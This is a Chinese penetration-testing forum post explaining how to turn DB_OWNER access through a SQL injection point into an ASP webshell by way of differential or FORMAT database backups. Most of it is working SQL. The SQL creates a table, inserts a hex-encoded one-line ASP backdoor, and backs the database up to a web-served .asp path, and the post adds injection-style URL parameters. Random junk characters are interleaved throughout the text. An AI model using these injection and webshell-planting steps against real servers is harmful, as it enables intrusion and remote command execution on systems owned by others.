中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进办法 [打印本页]

作者: admin    时间: 2012-11-9 21:31
标题: DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:1 p# j( H) g6 _) ?& K( e
: r$ z) b8 n1 x- D+ U
减少备份文件大小,得到可执行的webshell成功率提高不少& }/ i" j$ R" u% ^+ C  R1 ?. ^
一利用差异备份
2 U& u' C  T, q1 s: v6 A加一个参数WITH DIFFERENTIAL
, Z( e3 D4 F. t+ t9 ^: X2 C3 U% ?; @4 O: ]6 A
18 J, g% v- |$ N+ G
2
! B/ o6 P, a7 w) u3
0 s( j, Q; B3 W: q8 o& ^; j# [4
1 c0 b" ~" B8 D( d declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s, p9 Y$ `0 b$ @& e
create table [dbo].[xiaolu] ([cmd] [image]);- N/ J+ v0 @# W7 g! l+ U
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( }( E: n  s2 y1 M: y# edeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL ' K) u0 u% k% S  F2 m9 w

7 I, k" w4 l- g二利用完全FORMAT
3 B+ z8 @( r/ U8 P0 \& T加一个参数WITH FROMAT
, J; q) {! e5 O0 C9 d9 M% s有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以8 k) o" }0 m1 q3 b) \

3 w) k4 h3 m/ l4 w# n1
4 B0 _& j: s% P* ]7 U4 {. T2/ {) i; g2 s1 R7 Z% E0 x; V
3
. k9 z5 i/ i2 ~" _- S/ G2 Z4, i: n) i1 c) @8 P
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
9 I3 \5 P; u2 G( S7 D+ Tcreate table [dbo].[xiaolu] ([cmd] [image]);( q& [: X# H; k8 r8 e, z+ f
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)0 G( ^$ @! ]9 j5 k; U+ q
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
7 F: Z. x& n7 o; [% I8 p
3 I7 {* r6 k3 i2 K9 @总的来说就是那么简单几句,下面以备份数据库model为例子1 b3 T1 k9 `$ o; O: n7 u$ F
1
% C" m+ W4 H; T$ V
1 ?0 s- d1 c; @6 T$ U/ Q" n1  w  j. P2 y! a+ b
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
6 R; o: F& F- U4 |
' @2 z2 u' G4 M$ z- I, S2" I. _* l4 x/ O7 w5 ?

4 X' _, d! n& m6 x$ T17 J: t9 M3 _" ~
id=1;backup database model to disk='你的路径‘ with differential,format;--
; A, k% Z4 `- J+ i. g7 s  j/ H




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2